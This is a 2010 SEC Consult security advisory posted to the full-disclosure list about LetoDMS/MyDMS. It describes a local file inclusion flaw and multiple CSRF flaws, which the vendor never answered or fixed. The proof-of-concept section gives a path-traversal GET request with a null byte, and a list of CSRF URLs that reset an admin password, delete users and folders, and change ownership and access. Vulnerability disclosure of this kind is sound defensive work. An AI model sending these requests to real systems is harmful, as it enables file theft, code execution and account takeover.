[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100115151602.19302ea8@sec-consult.com>
Date: Fri, 15 Jan 2010 15:16:02 +0100
From: Lukas Weichselbaum <research@...-consult.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: SEC Consult SA-20100115-0 :: Local file
inclusion/execution and multiple CSRF vulnerabilities in LetoDMS (formerly
MyDMS)
SEC Consult Security Advisory < 20100115-0 >
========================================================================
title: Local file inclusion/execution and multiple
Cross-Site-Request-Forgery vulnerabilities in
LetoDMS (formerly MyDMS)
products: LetoDMS (formerly MyDMS)
vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2
fixed version: n.a.
impact: critical
homepage: http://sourceforge.net/projects/mydms/
found: 2009-10-09
by: D. Fabian / SEC Consult / www.sec-consult.com
L. Weichselbaum / SEC Consult / www.sec-consult.com
========================================================================
Vendor description:
-------------------
MyDMS is an open-source, web-based document management system (DMS)
written in PHP with a database backend. Originally coded by Markus
Westphal, MyDMS provides document meta-data, version control, security
and easy access to your documents.
source: http://sourceforge.net/projects/mydms/
Vulnerability overview/description:
-----------------------------------
The lang-parameter of /mydms/op/op.Login.php is vulnerable to file
inclusion. Through this vulnerability it is possible to read sensitive
data of the web server and to execute malicious PHP-code.
Furthermore there exist multiple Cross-Site-Request-Forgery
vulnerabilities which can be used to force a user/admin to execute
unwanted actions. Some of these actions are:
* Create new user with admin-privileges
* Change user credentials
* Delete a user/folder/document
* Change owner of a document
* Change access to a document
* Add keywords
* Add notifications
* Move folders
Proof of concept:
-----------------
File inclusion/execution
========================
If the guest-account is activated or you have a user to log in, it is
possible to include or execute files. The lang-parameter can be
modified in a malicious way. To terminate the predefined file-ending a
null-byte has to be appended after the file to be included. The
following GET-request can be used to e.g. receive the content of the
boot.ini-file on a server running Windows as operating system. This
vulnerability can also be used to execute malicious PHP-code (e.g.
PHP-code that has been written into log-files).
PoC request
GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1
[...]
Cross-Site-Request-Forgery (CSRF)
=================================
The following requests can be used for CSRF-attacks:
- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
&fullname=Administrator&email=address@...ver.com&comment=&userfile=
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
&groupid=-1&mode=4
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
&groupid=-1
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1
It is assumed that there is more functionality vulnerable to
CSRF-attacks
Vulnerable versions:
--------------------
MyDMS
* <= 1.7.2
Vendor contact timeline:
------------------------
2009-10-29: Contacting developers on SourceForge.Net and on
trilexnet.com by contact-form and the dev-forum.
2009-12-11: No response from developers so far.
2009-12-11: New attempt to contact developers.
2010-01-15: No response from developers.
2010-01-15: Release of the advisory.
Solution:
---------
n.a.
Advisory URL:
-------------
https://www.sec-consult.com/advisories.html#a64
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html
EOF L. Weichselbaum / @2010
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists